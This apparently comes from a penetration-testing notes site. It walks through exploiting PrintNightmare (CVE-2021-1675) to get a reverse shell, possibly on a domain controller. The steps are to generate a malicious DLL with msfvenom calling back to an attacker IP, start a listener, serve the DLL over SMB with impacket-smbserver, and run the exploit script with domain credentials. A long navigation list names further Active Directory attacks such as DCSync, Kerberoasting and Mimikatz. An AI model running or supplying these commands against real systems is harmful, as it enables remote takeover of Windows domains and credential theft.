PrintNightmare

Remote Code Execution

https://github.com/cube0x0/CVE-2021-1675

Contains full details on scanning and mitigation. Could potentially be used against a domain controller for easy access to a reverse shell.

Create Payload

msfvenom -p <payload> LHOST=<kali-ip> LPORT=<port> -f dll -o file.dll

Start a Listener

Could be netcat or metasploit multi-handler

Host the DLL Over SMB

The Kali Linux developers have created a series of wrappers around Impacket scripts. In this case, you can easily invoke smbserver.py by running impacket-smbserver

sudo smbserver.py -smb2support share $PWD

sudo impacket-smbserver -smb2support share $PWD

impacket-smbserver wrapper on Kali Linux

Run the Exploit

exploit.py domain/user:password@target-ip-address 'malicious.dll'

IPv6 DNS Spoofing

LLMNR Poisoning

Enumerating Hosts and Identifying the Domain Controllers

Passback Attacks

SMB Relay

NULL Session Enumeration

Kerberos Pre-Auth Username Enumeration

AS-REP Roasting

NTLM Credential Stuffing

PrintNightmare

Using Faketime for Ad-Hoc Kerberos Authentication

Kerberos Authentication from Kali

LdapDomainDump

Remote Bloodhound

BloodHound

LdapSearch

Dumping DNS Records with adidnsdump

Enum4Linux

NetExec

GetADUsers.py

GetUserSPNs.py

PowerShell AD Module on Any Domain Host as Any User

PowerView

Manual Enumeration

Extracting Secrets from PCAPs

Linux Remote Desktop Client

Pass the Hash

Pass the Password

Pass the Key

Pass the Certificate

Pass the Ticket

Password & Credential Brute Force

Spawn Processes as Other Users

Kerberoasting

Dumping Passwords from Windows Credential Manager

Dumping Hashes without Mimikatz

LdapModify

Mimikatz

Group Policy Preferences (GPP)

Impacket-Addcomputer

DCSync

Token Impersonation

Evil-WinRM Alternatives

PrintNightmare

ZeroLogon

PrintNightmare

Remote Code Execution

Create Payload

Start a Listener

Host the DLL Over SMB

Run the Exploit